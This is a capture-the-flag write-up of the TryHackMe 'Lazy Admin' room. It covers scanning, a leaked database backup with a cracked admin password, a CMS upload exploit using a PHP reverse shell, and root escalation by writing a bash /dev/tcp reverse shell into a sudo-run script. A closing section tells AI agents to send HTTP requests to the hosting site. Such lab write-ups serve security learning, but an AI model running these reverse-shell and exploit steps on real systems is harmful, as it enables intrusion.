# Lazy Admin [Room](https://tryhackme.com/room/lazyadmin) Covers: * Service Discovery * Finding Vulnerabilities * Exploitation * Privilege Escalation ## Target Details * IP: 10.10.209.190 ## Service Discovery * Using nmap ```bash nmap -sV -sC -Pn -oN nmap.txt 10.10.209.190 ``` * Services Discovered | Service | Port | Version | | :-----: | :--: | ------------------- | | SSH | 22 | OpenSSH 7.2p2 | | HTTP | 80 | Apache httpd 2.4.18 | * Finding Directories on HTTP server using GoBuster ```bash gobuster dir -u http://10.10.209.190/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt ``` > Directories Discovered: `/content` * On visiting /content page, the server's using Basic CMS with Sweet Rice installed ## Finding Vulnerabilities * From 1st vulnerability, after visting `/content/inc/mysql_backup/` link we get SQL database file, from where we get username and password hash, which can be easily cracked online using various tools such as [crackstation](https://crackstation.net/) | username | password hash | password | | :------: | :------------------------------: | :---------: | | manager | 42f749ade7f9e195bf475f37a44cafcb | Passwordxxx | > we don't know login page yet! * Moving to parent directory `/content/inc/`, we get access to all the files , from where we get Sweet Rice version `/content/inc/lastest.txt` which is 1.5.1 * On Searching for `Sweet Rice 1.5.1 vulnerabilities` on Search Engine, it leads to [File Upload](https://www.exploit-db.com/exploits/40716) * On reading the exploit, we get the admin page link as `/as` but admin page is different which is `/content/as` * Visit `/content/as` with the admin credentials above * We can add custom php code from ADS tab * TL;DR; | Service | Vulnerability | | :--------------: | :------------------------------------------------------------: | | Sweet Rice | [Backup Disclosure](https://www.exploit-db.com/exploits/40718) | | Sweet Rice 1.5.1 | [File Upload](https://www.exploit-db.com/exploits/40716) | | | | ## Exploitation * Create an evil reverse shell adversitement * Using PentestMonkey [php reverse shell template](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php), we can get access to shell, by chaning `ip` variable to our attacker's vpn ip, and then upload * Start listener using netcat ```bash nc -nlvp 1234 ``` * From `content/inc/ads/` we can execute the uploaded reverse shell * We have access to the shell ```bash listening on [any] 1234 ... connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312 Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux 11:43:09 up 1:26, 0 users, load average: 0.83, 0.30, 0.10 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ sudo -l Matching Defaults entries for www-data on THM-Chal: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on THM-Chal: (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl ``` > We can run perl and /home/itguy/backup.pl as root ## Privilege Escalation * Finding Escalation Vectors ```bash listening on [any] 1234 ... connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312 Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux 11:43:09 up 1:26, 0 users, load average: 0.83, 0.30, 0.10 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ sudo -l Matching Defaults entries for www-data on THM-Chal: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on THM-Chal: (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl ``` > We can run perl and /home/itguy/backup.pl as root * Victim's shell ```bash # overwrite contents of copy.sh with reverse shell on port echo "/bin/bash -c 'exec bash -i &>/dev/tcp/[ATTACKER_VPN_IP]/4444 <&1'" > /etc/copy.sh # on attacker's machine start netcat listener session on port 4444 # nc -nlvp 4444 # execute reverse shell with sudo rights sudo /usr/bin/perl /home/itguy/backup.pl ``` * Root Shell on Attacker's machine ```bash nc -nlvp 4444 listening on [any] 4444 ... connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 52812 bash: cannot set terminal process group (1058): Inappropriate ioctl for device bash: no job control in this shell root@THM-Chal:/# ``` ## Get Flags * User Flag ```bash cat /home/itguy/user.txt # THM{63e5bce9271952xxxxxxxxxxxxxxxxxx} ``` * Root Flag ```bash cat /root/root.txt # THM{6637f41d0177bxxxxxxxxxxxxxxxxxxx} ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dmdhrumilmistry.gitbook.io/home/blog/tryhackme-writeups/lazy-admin.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.